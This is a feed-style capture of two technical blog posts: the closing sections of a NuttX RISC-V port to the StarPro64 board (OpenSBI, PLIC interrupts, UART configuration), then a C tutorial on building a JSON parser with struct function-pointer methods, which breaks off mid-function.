    (Previously here)

    How to Restart NuttX on Hart 0? By calling OpenSBI, adapted from riscv_sbi.c

    // We start a Hart (0 to 3) by calling OpenSBI
    // addr points to our RISC-V Assembly Start Code
    static int boot_secondary(uintreg_t hartid, uintreg_t addr) {
    
      // Make an ECALL to OpenSBI
      sbiret_t ret = sbi_ecall(
        SBI_EXT_HSM, SBI_EXT_HSM_HART_START,
        hartid, addr, 0, 0, 0, 0
      );
    
      // Check for OpenSBI Errors
      if (ret.error < 0) { _err("Boot Hart %d failed\n", hartid); PANIC(); }
      return 0;
    }
    
    // Make an ECALL to OpenSBI
    static sbiret_t sbi_ecall(unsigned int extid, unsigned int fid, uintreg_t parm0, uintreg_t parm1, uintreg_t parm2, uintreg_t parm3, uintreg_t parm4, uintreg_t parm5) {
      register long r0 asm("a0") = (long)(parm0);
      register long r1 asm("a1") = (long)(parm1);
      register long r2 asm("a2") = (long)(parm2);
      register long r3 asm("a3") = (long)(parm3);
      register long r4 asm("a4") = (long)(parm4);
      register long r5 asm("a5") = (long)(parm5);
      register long r6 asm("a6") = (long)(fid);
      register long r7 asm("a7") = (long)(extid);
      sbiret_t ret;
    
      asm volatile
        (
         "ecall"
         : "+r"(r0), "+r"(r1)
         : "r"(r2), "r"(r3), "r"(r4), "r"(r5), "r"(r6), "r"(r7)
         : "memory"
         );
      ret.error = r0;
      ret.value = (uintreg_t)r1;
      return ret;
    }
    
    // OpenSBI returns an Error Code and Result Value
    struct sbiret_s {
      intreg_t    error;
      uintreg_t   value;
    };
    typedef struct sbiret_s sbiret_t;
    
    // These are the Standard OpenSBI Extension Codes
    #define SBI_EXT_HSM (0x0048534D)
    #define SBI_EXT_HSM_HART_START (0x0)

    (Previously here)

    For Multiple Harts in future: We shall start the other Non-Boot Harts by calling OpenSBI…

    // TODO SMP: Start the other Non-Boot Harts by calling OpenSBI
    static void eic7700x_boot_secondary(void) {
      for (int i = 0; i < CONFIG_SMP_NCPUS; i++) {
        if (i == g_eic7700x_boot_hart) { continue; }
        boot_secondary(i, (uintptr_t)&__start);
      }
    }

    (Previously here)

    For Multiple Harts in future: NuttX insists on Booting with CPU 0 Only. Thus we set Boot Hart as CPU 0, and we Renumber the Other Harts…

    // TODO SMP: Convert Hart ID to CPU ID.
    // Boot Hart is CPU 0. Renumber the Other Harts.
    int weak_function riscv_hartid_to_cpuid(int hart) {
      if (hart == g_eic7700x_boot_hart)
        { return 0; }
      else if (hart < g_eic7700x_boot_hart)
        { return hart + 1; }
      else
        { return hart; }
    }
    
    // TODO SMP: Convert CPU ID to Hart ID.
    // Boot Hart is CPU 0. Renumber the Other Harts.
    int weak_function riscv_cpuid_to_hartid(int cpu) {
      if (cpu == 0)
        { return g_eic7700x_boot_hart; }
      else if (cpu < g_eic7700x_boot_hart + 1)
        { return cpu - 1; }
      else
        { return cpu; }
    }

    (Previously here)

    For Example: If boot_hart=2 then…

    • hart=0, cpu=1
    • hart=1, cpu=2
    • hart=2, cpu=0
    • hart=3, cpu=3

    (Multiple Harts explained)
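
    To convince ourselves that the mapping round-trips, here’s a quick host-side test harness (hypothetical, not NuttX code) with Boot Hart = 2, matching the table above…

    #include <assert.h>

    // Same mapping logic as above, with Boot Hart = 2 (hypothetical harness)
    static int boot_hart = 2;
    static int hart_to_cpu(int hart) {
      if (hart == boot_hart)     { return 0; }
      else if (hart < boot_hart) { return hart + 1; }
      else                       { return hart; }
    }
    static int cpu_to_hart(int cpu) {
      if (cpu == 0)                 { return boot_hart; }
      else if (cpu < boot_hart + 1) { return cpu - 1; }
      else                          { return cpu; }
    }

    int main(void) {
      // Matches the table: hart 2 -> cpu 0, hart 0 -> cpu 1, hart 1 -> cpu 2, hart 3 -> cpu 3
      assert(hart_to_cpu(2) == 0 && hart_to_cpu(0) == 1);
      assert(hart_to_cpu(1) == 2 && hart_to_cpu(3) == 3);
      // And the mapping round-trips for every CPU
      for (int cpu = 0; cpu < 4; cpu++) { assert(hart_to_cpu(cpu_to_hart(cpu)) == cpu); }
      return 0;
    }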

    §14.3 PLIC Interrupt Controller

    arch/risc-v/include/eic7700x/irq.h

    // Number of PLIC External Interrupts supported
    #define EIC7700X_PLIC_IRQS 458
    
    // Offset by RISCV_IRQ_SEXT
    #define NR_IRQS (RISCV_IRQ_SEXT + EIC7700X_PLIC_IRQS)

    (Previously here)

    That’s because EIC7700X supports 458 External Interrupts. (RISCV_IRQ_SEXT is 25, as we’ll see in the UART IRQ computation below, so NR_IRQS works out to 25 + 458 = 483)


    arch/risc-v/src/eic7700x/hardware/eic7700x_memorymap.h

    // PLIC Base Address
    #define EIC7700X_PLIC_BASE 0x0C000000ul

    (Previously here)

    PLIC Base Address is specified here…


    arch/risc-v/src/eic7700x/hardware/eic7700x_plic.h

    // PLIC Interrupt Priority: Single Global Register
    #define EIC7700X_PLIC_PRIORITY (EIC7700X_PLIC_BASE + 0x000000)
    
    // Hart 0 S-Mode Interrupt Enable and Offset Between Harts
    #define EIC7700X_PLIC_ENABLE0     (EIC7700X_PLIC_BASE + 0x002080)
    #define EIC7700X_PLIC_ENABLE_HART 0x100
    
    // Hart 0 S-Mode Priority Threshold and Offset Between Harts
    #define EIC7700X_PLIC_THRESHOLD0     (EIC7700X_PLIC_BASE + 0x201000)
    #define EIC7700X_PLIC_THRESHOLD_HART 0x2000
    
    // Hart 0 S-Mode Claim / Complete and Offset Between Harts
    #define EIC7700X_PLIC_CLAIM0     (EIC7700X_PLIC_BASE + 0x201004)
    #define EIC7700X_PLIC_CLAIM_HART 0x2000

    (Previously here)

    Interrupt Enable: PLIC_ENABLE_HART is 0x100 because we skip 0x100 bytes per Hart…

    EIC7700X Tech Ref #1, Page 240
    (Skip the M-Modes)
    0x0C00_2080  Start Hart 0 S-Mode interrupt enables
    0x0C00_2180  Start Hart 1 S-Mode interrupt enables
    0x0C00_2280  Start Hart 2 S-Mode interrupt enables

    Priority Threshold: PLIC_THRESHOLD_HART is 0x2000 because we skip 0x2000 bytes per Hart

    Claim / Complete: PLIC_CLAIM_HART is 0x2000 because we skip 0x2000 bytes per Hart

    Which comes from this…

    EIC7700X Tech Ref #1, Page 241
    (Skip the M-Modes)
    0x0C20_1000  Hart 0 S-Mode Priority Threshold
    0x0C20_1004  Hart 0 S-Mode Claim / Complete
    0x0C20_3000  Hart 1 S-Mode Priority Threshold
    0x0C20_3004  Hart 1 S-Mode Claim / Complete
    0x0C20_5000  Hart 2 S-Mode Priority Threshold
    0x0C20_5004  Hart 2 S-Mode Claim / Complete

    (Multiple Harts explained)


    arch/risc-v/src/eic7700x/eic7700x_irq.c

    In future we shall support Multiple Harts. That’s why we extended this code to Initialize the Interrupts for Harts 0 to 3…

    // Initialize the Interrupts
    void up_irqinitialize(void) { ...
    
      // Disable all global interrupts
      for (hart = 0; hart < CONFIG_SMP_NCPUS; hart++) {
        addr = EIC7700X_PLIC_ENABLE0 + (hart * EIC7700X_PLIC_ENABLE_HART);
        for (offset = 0; offset < EIC7700X_PLIC_IRQS >> 3; offset += 4) {
          putreg32(0x0, addr + offset);          
        }
      }
    
      // Clear pendings in PLIC
      for (hart = 0; hart < CONFIG_SMP_NCPUS; hart++) {
        addr = EIC7700X_PLIC_CLAIM0 + (hart * EIC7700X_PLIC_CLAIM_HART);
        claim = getreg32(addr);
        putreg32(claim, addr);
      }
    
      // Set irq threshold to 0 (permits all global interrupts)
      for (hart = 0; hart < CONFIG_SMP_NCPUS; hart++) {
        addr = EIC7700X_PLIC_THRESHOLD0 + (hart * EIC7700X_PLIC_THRESHOLD_HART);
        putreg32(0, addr);
      }

    (Previously here)

    We do this to Disable the Interrupts for the Boot Hart (which may be any of Harts 0 to 3)

    // Disable the Interrupt
    void up_disable_irq(int irq) { ...
    
      // Clear enable bit for the irq
      if (0 <= extirq && extirq <= EIC7700X_PLIC_IRQS) {
        addr = EIC7700X_PLIC_ENABLE0 + 
               (g_eic7700x_boot_hart * EIC7700X_PLIC_ENABLE_HART);
        modifyreg32(addr + (4 * (extirq / 32)),
                    1 << (extirq % 32), 0);
      }

    (Previously here)

    And this to Enable the Interrupts for the Boot Hart (which may be any of Harts 0 to 3)

    // Enable the Interrupt
    void up_enable_irq(int irq) { ...
    
      // Set enable bit for the irq
      if (0 <= extirq && extirq <= EIC7700X_PLIC_IRQS) {
        addr = EIC7700X_PLIC_ENABLE0 + 
               (g_eic7700x_boot_hart * EIC7700X_PLIC_ENABLE_HART);
        modifyreg32(addr + (4 * (extirq / 32)),
                    0, 1 << (extirq % 32));
      }

    (Previously here)

    (Multiple Harts explained)


    arch/risc-v/src/eic7700x/eic7700x_irq_dispatch.c

    In future we shall support Multiple Harts. That’s why we extended this code to Dispatch the Interrupt via the Boot Hart (which may be any of Harts 0 to 3)…

    // Dispatch the Interrupt
    void *riscv_dispatch_irq(uintptr_t vector, uintptr_t *regs) {
      int irq = (vector >> RV_IRQ_MASK) | (vector & 0xf);
      uintptr_t claim = EIC7700X_PLIC_CLAIM0 + 
                        (g_eic7700x_boot_hart * EIC7700X_PLIC_CLAIM_HART);
      ...
      // Read the PLIC_CLAIM for the Boot Hart
      uintptr_t val = getreg32(claim);
      ...
      // Write PLIC_CLAIM to clear pending for Boot Hart
      putreg32(irq - RISCV_IRQ_EXT, claim);

    (Previously here)

    (Multiple Harts explained)

    §14.4 Memory Map

    arch/risc-v/src/eic7700x/eic7700x_mm_init.c

    // I/O Memory Map
    #define MMU_IO_BASE (0x00000000ul)
    #define MMU_IO_SIZE (0x80000000ul)

    (Previously here)

    We derived the above from the EIC7700X Memory Map

    EIC7700X Tech Ref #1, Page 380: System Memory Map
    System Space (Low)  0x0000_0000 to 0x8000_0000
    Memory Space        0x8000_0000 to 0x10_0000_0000

    The rest of the Memory Map is identical to SG2000. We removed all T-Head MMU Extensions, including mmu_flush_cache.

    §14.5 NuttX Config

    arch/risc-v/Kconfig

    In future we shall support Multiple Harts. This Arch Config will enable the Hart-To-CPU Mapping we saw earlier: riscv_hartid_to_cpuid, riscv_cpuid_to_hartid

    config ARCH_CHIP_EIC7700X
      ## TODO SMP: Enable Hart-To-CPU Mapping
      ## select ARCH_RV_CPUID_MAP

    (Previously here)

    Also we removed ARCH_MMU_EXT_THEAD. (T-Head MMU Extensions)

    (Multiple Harts explained)


    boards/risc-v/eic7700x/starpro64/configs/nsh/defconfig

    We modified the NuttX Board Config for UART…

    ## UART0 Configuration
    CONFIG_16550_REGINCR=4
    CONFIG_16550_UART0_BASE=0x50900000
    CONFIG_16550_UART0_CLOCK=198144000
    CONFIG_16550_UART0_IRQ=125

    (Previously here)

    16550_REGINCR is 4 because the UART Registers are spaced 4 bytes apart…

    EIC7700X Tech Ref #4, Page 524: UART Register Offsets
    0x0  Receive Buffer Register (RBR)
    0x4  Interrupt Enable Register (IER)
    0x8  Interrupt Identification Register (IIR)

    UART0 Base Address is here…
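
    As a quick sanity check: with 16550_REGINCR=4, Register Number N lands at Base Address + 4 * N, matching the table above. A tiny illustrative sketch (the UART_REG macro is ours, not NuttX’s)…

    // Illustrative only: how Register N of UART0 is located when the
    // 16550 registers are spaced 4 bytes apart (16550_REGINCR=4)
    #define UART0_BASE  0x50900000ul
    #define UART_REG(n) (UART0_BASE + 4ul * (n))
    // UART_REG(0) = 0x5090_0000 (RBR)
    // UART_REG(1) = 0x5090_0004 (IER)
    // UART_REG(2) = 0x5090_0008 (IIR)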

    Why IRQ 125? UART0 Interrupt Number is 100, we add 25 because of RISCV_IRQ_SEXT

    16550_UART0_CLOCK was computed according to these instructions

    NuttX UART Debug Log shows:
      dlm = 0x00
      dll = 0x6c
    
    We know that:
      dlm = 0x00 = (div >> 8)
      dll = 0x6c = (div & 0xff)
    
    Which means:
      div = 0x6c
    
    We know that:
      baud = 115200
      div  = (uartclk + (baud << 3)) / (baud << 4)
    
    Therefore:
      0x6c    = (uartclk + 921600) / 1843200
      uartclk = (0x6c * 1843200) - 921600
              = 198144000
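
    Here’s the same arithmetic as a tiny C check (illustrative only)…

    #include <stdio.h>

    int main(void) {
      // div = (uartclk + (baud << 3)) / (baud << 4), per the 16550 formula above
      unsigned long uartclk = 198144000ul;
      unsigned long baud    = 115200ul;
      unsigned long div     = (uartclk + (baud << 3)) / (baud << 4);
      printf("div = 0x%lx\n", div);  // Prints 0x6c, matching dll=0x6c and dlm=0x00
      return 0;
    }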

    arch/risc-v/src/eic7700x/eic7700x_timerisr.c

    Finally we changed the RISC-V Timer Frequency. We executed the sleep 10 command in NSH and adjusted the frequency…

    // Previously for SG2000: 25000000ul
    #define MTIMER_FREQ 1000000ul

    (Previously here)

    §14.6 Paste Slowly

    U-Boot Bootloader is dropping chars when we paste long lines. How now brown cow?

    In iTerm: Try Edit > Paste Special > Paste Slowly

    But Before That: Click Settings > Advanced > Pasteboard

    • “Delay in seconds between chunks when Pasting Slowly”

      Set to 1 second

    • “Number of bytes to paste in each chunk when Pasting Slowly”

      Set to 16 bytes

    ]]>
    https://lupyuen.org/articles/starpro64.html hacker-news-small-sites-43222490 Sat, 01 Mar 2025 19:05:05 GMT
    <![CDATA[Abusing C to implement JSON parsing with struct methods]]> thread link) | @ingve
    March 1, 2025 | https://xnacly.me/posts/2025/json-parser-in-c-with-methods/ | archive.org

    Idea

    1. Build a JSON parser in C
    2. Instead of free-standing functions: attach functions to a struct and use these as methods
    3. Make it free of the usual C issue family (segfaults, leaks, stack overflows, etc…)
    4. Provide an ergonomic API

    Usage

    C

    #include "json.h"
    #include <stdlib.h>

    int main(void) {
      struct json json = json_new(JSON({
        "object" : {},
        "array" : [[]],
        "atoms" : [ "string", 0.1, true, false, null ]
      }));
      struct json_value json_value = json.parse(&json);
      json_print_value(&json_value);
      puts("");
      json_free_value(&json_value);
      return EXIT_SUCCESS;
    }

    Tip - Compiling C projects the easy way

    Don’t take this as a guide for using make, in my projects I just use it as a command runner.

    Compiler flags

    These flags may be specific to gcc; I use gcc (GCC) 14.2.1 20250207, so take this with a grain of salt.

    I use these flags in almost every C project I’ve ever started.

    SH

    gcc -std=c23 \
      -O2 \
      -Wall \
      -Wextra \
      -Werror \
      -fdiagnostics-color=always \
      -fsanitize=address,undefined \
      -fno-common \
      -Winit-self \
      -Wfloat-equal \
      -Wundef \
      -Wshadow \
      -Wpointer-arith \
      -Wcast-align \
      -Wstrict-prototypes \
      -Wstrict-overflow=5 \
      -Wwrite-strings \
      -Waggregate-return \
      -Wswitch-default \
      -Wno-discarded-qualifiers \
      -Wno-aggregate-return \
      main.c
    Flag                          Description
    -std=c23                      set lang standard, I use ISO C23
    -O2                           optimize more than -O1
    -Wall                         enable a list of warnings
    -Wextra                       enable more warnings than -Wall
    -Werror                       convert all warnings to errors
    -fdiagnostics-color=always    use color in diagnostics
    -fsanitize=address,undefined  enable AddressSanitizer and UndefinedBehaviorSanitizer
    -fno-common                   place uninitialized global variables in the BSS section
    -Winit-self                   warn about uninitialized variables
    -Wfloat-equal                 warn if floating-point values are used in equality comparisons
    -Wundef                       warn if an undefined identifier is evaluated
    -Wshadow                      warn whenever a local variable or type declaration shadows another variable, parameter or type
    -Wpointer-arith               warn about anything that depends on the “size of” a function type or of void
    -Wcast-align                  warn whenever a pointer is cast such that the required alignment of the target is increased
    -Wstrict-prototypes           warn if a function is declared or defined without specifying the argument types
    -Wstrict-overflow=5           warn about cases where the compiler optimizes based on the assumption that signed overflow does not occur
    -Wwrite-strings               give string constants the type const char[length], warns on copy into non const char*
    -Wswitch-default              warn whenever a switch statement does not have a default case
    -Wno-discarded-qualifiers     do not warn if type qualifiers on pointers are being discarded
    -Wno-aggregate-return         do not warn if any functions that return structures or unions are defined or called

    Sourcing source files

    I generally keep my header and source files in the same directory as the makefile, so I use find to find them:

    SHELL

    $(shell find . -name "*.c")

    Make and Makefiles

    I don’t declare the build target as .PHONY because I generally never have a file or directory named build.

    Putting it all together as a makefile:

    MAKE

    CFLAGS := -std=c23 \
      -O2 \
      -Wall \
      -Wextra \
      -Werror \
      -fdiagnostics-color=always \
      -fsanitize=address,undefined \
      -fno-common \
      -Winit-self \
      -Wfloat-equal \
      -Wundef \
      -Wshadow \
      -Wpointer-arith \
      -Wcast-align \
      -Wstrict-prototypes \
      -Wstrict-overflow=5 \
      -Wwrite-strings \
      -Waggregate-return \
      -Wcast-qual \
      -Wswitch-default \
      -Wno-discarded-qualifiers \
      -Wno-aggregate-return

    FILES := $(shell find . -name "*.c")

    build:
    	$(CC) $(CFLAGS) $(FILES) -o jsoninc
    

    Variadic macros to write inline raw JSON

    This doesn’t really deserve its own section, but I use #<expression> to stringify C expressions in conjunction with __VA_ARGS__:

    C

    #define JSON(...) #__VA_ARGS__

    This enables:

    C

    char *raw_json = JSON({ "array" : [ [], {}] });

    Inlines to:

    C

    char *raw_json = "{ \"array\" : [ [], {}] }";

    Representing JSON values in memory

    I need a structure to hold a parsed JSON value: its type and its contents.

    Types of JSON values

    A JSON value can be one of:

    1. null
    2. true
    3. false
    4. number
    5. string
    6. array
    7. object

    In C i use an enum to represent this:

    C

    // json.h
    enum json_type {
      json_number,
      json_string,
      json_boolean,
      json_null,
      json_object,
      json_array,
    };

    extern char *json_type_map[];

    And I use json_type_map to map all json_type values to their char* representation:

    C

    char *json_type_map[] = {
        [json_number] = "json_number",   [json_string] = "json_string",
        [json_boolean] = "json_boolean", [json_null] = "json_null",
        [json_object] = "json_object",   [json_array] = "json_array",
    };

    json_value & unions for atoms, array elements or object values and object keys

    The json_value struct holds the type (as defined above); a union sharing memory space for either a boolean, a string or a number; a list of json_value structures serving as array children or object values; a list of strings for the object keys; and the shared length of those lists.

    C

    struct json_value {
      enum json_type type;
      union {
        bool boolean;
        char *string;
        double number;
      } value;
      struct json_value *values;
      char **object_keys;
      size_t length;
    };

    Tearing values down

    Since some of the fields in json_value are heap allocated, we have to destroy / free the structure once we no longer use it or before exiting the process. json_free_value does exactly this:

    C

    void json_free_value(struct json_value *json_value) {
      switch (json_value->type) {
      case json_string:
        free(json_value->value.string);
        break;
      case json_object:
        for (size_t i = 0; i < json_value->length; i++) {
          free(json_value->object_keys[i]);
          json_free_value(&json_value->values[i]);
        }
        if (json_value->object_keys != NULL) {
          free(json_value->object_keys);
          json_value->object_keys = NULL;
        }
        if (json_value->values != NULL) {
          free(json_value->values);
          json_value->values = NULL;
        }
        break;
      case json_array:
        for (size_t i = 0; i < json_value->length; i++) {
          json_free_value(&json_value->values[i]);
        }
        if (json_value->values != NULL) {
          free(json_value->values);
          json_value->values = NULL;
        }
        break;
      case json_number:
      case json_boolean:
      case json_null:
      default:
        break;
      }
      json_value->type = json_null;
    }

    As simple as that, we ignore stack allocated JSON value variants, such as json_number, json_boolean and json_null, while freeing allocated memory space for json_string, each json_array child and json_object keys and values.

    Printing json_values

    A memory representation with no way to inspect it is of no value to us, thus I dumped json_print_value into main.c:

    C

    void json_print_value(struct json_value *json_value) {
      switch (json_value->type) {
      case json_null:
        printf("null");
        break;
      case json_number:
        printf("%f", json_value->value.number);
        break;
      case json_string:
        printf("\"%s\"", json_value->value.string);
        break;
      case json_boolean:
        printf(json_value->value.boolean ? "true" : "false");
        break;
      case json_object:
        printf("{");
        for (size_t i = 0; i < json_value->length; i++) {
          printf("\"%s\": ", json_value->object_keys[i]);
          json_print_value(&json_value->values[i]);
          if (i < json_value->length - 1) {
            printf(", ");
          }
        }
        printf("}");
        break;
      case json_array:
        printf("[");
        for (size_t i = 0; i < json_value->length; i++) {
          json_print_value(&json_value->values[i]);
          if (i < json_value->length - 1) {
            printf(", ");
          }
        }
        printf("]");
        break;
      default:
        ASSERT(0, "Unimplemented json_value case");
        break;
      }
    }

    Calling this function:

    C

    int main(void) {
      struct json_value json_value = {
          .type = json_array,
          .length = 4,
          .values =
              (struct json_value[]){
                  (struct json_value){.type = json_string, .value.string = "hi"},
                  (struct json_value){.type = json_number, .value.number = 161},
                  (struct json_value){
                      .type = json_object,
                      .length = 1,
                      .object_keys =
                          (char *[]){
                              "key",
                          },
                      .values =
                          (struct json_value[]){
                              (struct json_value){.type = json_string,
                                                  .value.string = "value"},
                          },
                  },
                  (struct json_value){.type = json_null},
              },
      };
      json_print_value(&json_value);
      puts("");
      return EXIT_SUCCESS;
    }

    Results in:

    TEXT

    1["hi", 161.000000, {"key": "value"}, null]

    json Parser struct, Function pointers and how to use them (they suck)

    As contrary as it sounds, one can attach functions to structures in C very easily: just define a field of a struct as a function pointer, assign a function to it and you’ve got a method, just as you would in Go or Rust.

    C

    struct json {
      char *input;
      size_t pos;
      size_t length;
      char (*cur)(struct json *json);
      bool (*is_eof)(struct json *json);
      void (*advance)(struct json *json);
      struct json_value (*atom)(struct json *json);
      struct json_value (*array)(struct json *json);
      struct json_value (*object)(struct json *json);
      struct json_value (*parse)(struct json *json);
    };

    Of course you have to define a function the C way (<return type> <name>(<list of params>);) and assign it to your method field - but it is not that complicated:

    C

    struct json json_new(char *input) {
      ASSERT(input != NULL, "corrupted input");
      struct json j = (struct json){
          .input = input,
          .length = strlen(input) - 1,
      };

      j.cur = cur;
      j.is_eof = is_eof;
      j.advance = advance;
      j.parse = parse;
      j.object = object;
      j.array = array;
      j.atom = atom;

      return j;
    }

    cur, is_eof and advance are small helper functions:

    C

    static char cur(struct json *json) {
      ASSERT(json != NULL, "corrupted internal state");
      return json->is_eof(json) ? -1 : json->input[json->pos];
    }

    static bool is_eof(struct json *json) {
      ASSERT(json != NULL, "corrupted internal state");
      return json->pos > json->length;
    }

    static void advance(struct json *json) {
      ASSERT(json != NULL, "corrupted internal state");
      json->pos++;
      skip_whitespace(json);
    }

    ASSERT is a simple assertion macro:

    C

    #define ASSERT(EXP, context)                                                   \
      if (!(EXP)) {                                                                \
        fprintf(stderr,                                                            \
                "jsoninc: ASSERT(" #EXP "): `" context                             \
                "` failed at %s, line %d\n",                                       \
                __FILE__, __LINE__);                                               \
        exit(EXIT_FAILURE);                                                        \
      }

    Failing for instance if the argument to the json_new function is a null pointer:

    C

    int main(void) {
      struct json json = json_new(NULL);
      return EXIT_SUCCESS;
    }

    Complete with a descriptive message:

    TEXT

    jsoninc: ASSERT(input != NULL): `corrupted input` failed at ./json.c, line 16

    Parsing JSON with methods

    Now that we have the whole setup out of the way, we can start with the crux of the project: parsing JSON. Normally I would have written a separate lexer and parser, but for the sake of simplicity I combined these passes into a single parser architecture.

    Ignoring Whitespace

    As far as we are concerned, whitespace between JSON tokens carries no meaning - so we just use the skip_whitespace function to ignore any and all of it:

    C

    static void skip_whitespace(struct json *json) {
      while (!json->is_eof(json) &&
             (json->cur(json) == ' ' || json->cur(json) == '\t' ||
              json->cur(json) == '\n')) {
        json->pos++;
      }
    }
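
    One nitpick: json.org counts carriage returns as whitespace too, so a fully spec-faithful loop would (hypothetically) also skip '\r':

    C

    // Hypothetical spec-faithful condition inside skip_whitespace:
    // also skip '\r' (see json.org)
    while (!json->is_eof(json) &&
           (json->cur(json) == ' ' || json->cur(json) == '\t' ||
            json->cur(json) == '\n' || json->cur(json) == '\r')) {
      json->pos++;
    }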

    Parsing Atoms

    Since JSON has five kinds of atoms, we need to parse them into our json_value struct using the json->atom method:

    C

    static struct json_value atom(struct json *json) {
      ASSERT(json != NULL, "corrupted internal state");

      skip_whitespace(json);

      char cc = json->cur(json);
      if ((cc >= '0' && cc <= '9') || cc == '.' || cc == '-') {
        return number(json);
      }

      switch (cc) {
      // ... all of the atoms ...
      default:
        printf("unknown character '%c' at pos %zu\n", json->cur(json), json->pos);
        ASSERT(false, "unknown character");
        return (struct json_value){.type = json_null};
      }
    }

    numbers

    Info

    Technically numbers in JSON should include scientific notation and other fun stuff, but let’s just remember the project’s simplicity and my sanity; see json.org.

    C

    static struct json_value number(struct json *json) {
      ASSERT(json != NULL, "corrupted internal state");
      size_t start = json->pos;
      // i don't give a fuck about scientific notation <3
      for (char cc = json->cur(json);
           ((cc >= '0' && cc <= '9') || cc == '_' || cc == '.' || cc == '-');
           json->advance(json), cc = json->cur(json))
        ;

      char *slice = malloc(sizeof(char) * json->pos - start + 1);
      ASSERT(slice != NULL, "failed to allocate slice for number parsing")
      memcpy(slice, json->input + start, json->pos - start);
      slice[json->pos - start] = 0;
      double number = strtod(slice, NULL);
      free(slice);

      return (struct json_value){.type = json_number, .value = {.number = number}};
    }

    We keep track of the start of the number, advance as far as the number is still considered a number (any of 0-9 | _ | . | -). Once we hit the end we allocate a temporary string, copy the chars containing the number from the input string and terminate the string with \0. strtod is used to convert this string to a double. Once that is done we free the slice and return the result as a json_value.
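
    Since strtod already understands scientific notation, accepting it would (hypothetically) only mean widening the scanned character set - a sketch, not part of the parser above:

    C

    #include <stdbool.h>

    // Hypothetical predicate for a scan loop that also admits 1.5e-3 style
    // numbers; strtod would handle the actual conversion unchanged
    static bool is_number_char(char cc) {
      return (cc >= '0' && cc <= '9') || cc == '_' || cc == '.' ||
             cc == '-' || cc == '+' || cc == 'e' || cc == 'E';
    }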

    null, true and false

    null, true and false are unique atoms with a fixed length and fixed characters, so we can simply assert each of their characters:

    C

    static struct json_value atom(struct json *json) {
      ASSERT(json != NULL, "corrupted internal state");

      skip_whitespace(json);

      char cc = json->cur(json);
      if ((cc >= '0' && cc <= '9') || cc == '.' || cc == '-') {
        return number(json);
      }

      switch (cc) {
      case 'n': // null
        json->pos++;
        ASSERT(json->cur(json) == 'u', "unknown atom 'n', wanted 'null'")
        json->pos++;
        ASSERT(json->cur(json) == 'l', "unknown atom 'nu', wanted 'null'")
        json->pos++;
        ASSERT(json->cur(json) == 'l', "unknown atom 'nul', wanted 'null'")
        json->advance(json);
        return (struct json_value){.type = json_null};
      case 't': // true
        json->pos++;
        ASSERT(json->cur(json) == 'r', "unknown atom 't', wanted 'true'")
        json->pos++;
        ASSERT(json->cur(json) == 'u', "unknown atom 'tr', wanted 'true'")
        json->pos++;
        ASSERT(json->cur(json) == 'e', "unknown atom 'tru', wanted 'true'")
        json->advance(json);
        return (struct json_value){.type = json_boolean,
                                   .value = {.boolean = true}};
      case 'f': // false
        json->pos++;
        ASSERT(json->cur(json) == 'a', "invalid atom 'f', wanted 'false'")
        json->pos++;
        ASSERT(json->cur(json) == 'l', "invalid atom 'fa', wanted 'false'")
        json->pos++;
        ASSERT(json->cur(json) == 's', "invalid atom 'fal', wanted 'false'")
        json->pos++;
        ASSERT(json->cur(json) == 'e', "invalid atom 'fals', wanted 'false'")
        json->advance(json);
        return (struct json_value){.type = json_boolean,
                                   .value = {.boolean = false}};
      // ... strings ...
      default:
        printf("unknown character '%c' at pos %zu\n", json->cur(json), json->pos);
        ASSERT(false, "unknown character");
        return (struct json_value){.type = json_null};
      }
    }

    strings

    Info

    Again, similarly to JSON numbers, JSON strings should support escapes for quotation marks and other fun stuff, but let’s again just remember the project’s simplicity and my sanity; see json.org.

    C

    static char *string(struct json *json) {
      json->advance(json);
      size_t start = json->pos;
      // Stop at EOF too, else an unterminated string without a newline
      // would loop forever (cur() returns -1 at EOF)
      for (char cc = json->cur(json);
           !json->is_eof(json) && cc != '\n' && cc != '"';
           json->advance(json), cc = json->cur(json))
        ;

      char *slice = malloc(sizeof(char) * json->pos - start + 1);
      ASSERT(slice != NULL, "failed to allocate slice for a string")

      memcpy(slice, json->input + start, json->pos - start);
      slice[json->pos - start] = 0;

      ASSERT(json->cur(json) == '"', "unterminated string");
      json->advance(json);
      return slice;
    }

    Pretty easy stuff: as long as we are inside of the string (before ", \n and EOF) we advance; after that we copy the contents into a new slice and return that slice (this function is especially useful for object keys - that’s why it is a separate function).
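
    If we ever wanted escaped quotes, the scan loop would (hypothetically) have to skip the character following a backslash so that \" no longer terminates the string - a sketch only, without the unescaping pass the copied slice would then need:

    C

    // Hypothetical escape-aware scan loop for string(): an escaped
    // character never terminates the string
    for (char cc = json->cur(json); !json->is_eof(json) && cc != '"';
         json->advance(json), cc = json->cur(json)) {
      if (cc == '\\') {
        json->advance(json);  // skip the escaped character, e.g. the " in \"
      }
    }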

    Parsing Arrays

    Since arrays are just any number of JSON values between [ and ], separated by , - this one is not that hard to implement either:

    C

    struct json_value array(struct json *json) {
      ASSERT(json != NULL, "corrupted internal state");
      ASSERT(json->cur(json) == '[', "invalid array start");
      json->advance(json);

      struct json_value json_value = {.type = json_array};
      json_value.values = malloc(sizeof(struct json_value));

      while (!json->is_eof(json) && json->cur(json) != ']') {
        if (json_value.length > 0) {
          if (json->cur(json) != ',') {
            json_free_value(&json_value);
          }
          ASSERT(json->cur(json) == ',',
                 "expected , as the separator between array members");
          json->advance(json);
        }
        struct json_value member = json->parse(json);
        json_value.values = realloc(json_value.values,
                                    sizeof(json_value) * (json_value.length + 1));
        json_value.values[json_value.length++] = member;
      }

      ASSERT(json->cur(json) == ']', "missing array end");
      json->advance(json);
      return json_value;
    }

    We start with space for a single element and reallocate for every new child we find. We also check for the , between children.

    A geometrically growing array would probably be better to minimize allocations (see the sketch below), but here we are, writing unoptimized C code - still, it works :)
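
    Such a growing array could look like this - a minimal sketch that doubles the capacity when full; since struct json_value does not track a capacity, it lives in an extra parameter here:

    C

    // Hypothetical amortized-O(1) append: double the capacity when full.
    // `capacity` is extra state; struct json_value does not store it.
    static void push_value(struct json_value *array, struct json_value member,
                           size_t *capacity) {
      if (array->length == *capacity) {
        *capacity = *capacity ? *capacity * 2 : 4;
        array->values =
            realloc(array->values, sizeof(struct json_value) * *capacity);
        ASSERT(array->values != NULL, "failed to grow array");
      }
      array->values[array->length++] = member;
    }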

    Parsing Objects

    C

    struct json_value object(struct json *json) {
      ASSERT(json != NULL, "corrupted internal state");
      ASSERT(json->cur(json) == '{', "invalid object start");
      json->advance(json);

      struct json_value json_value = {.type = json_object};
      json_value.object_keys = malloc(sizeof(char *));
      json_value.values = malloc(sizeof(struct json_value));

      while (!json->is_eof(json) && json->cur(json) != '}') {
        if (json_value.length > 0) {
          if (json->cur(json) != ',') {
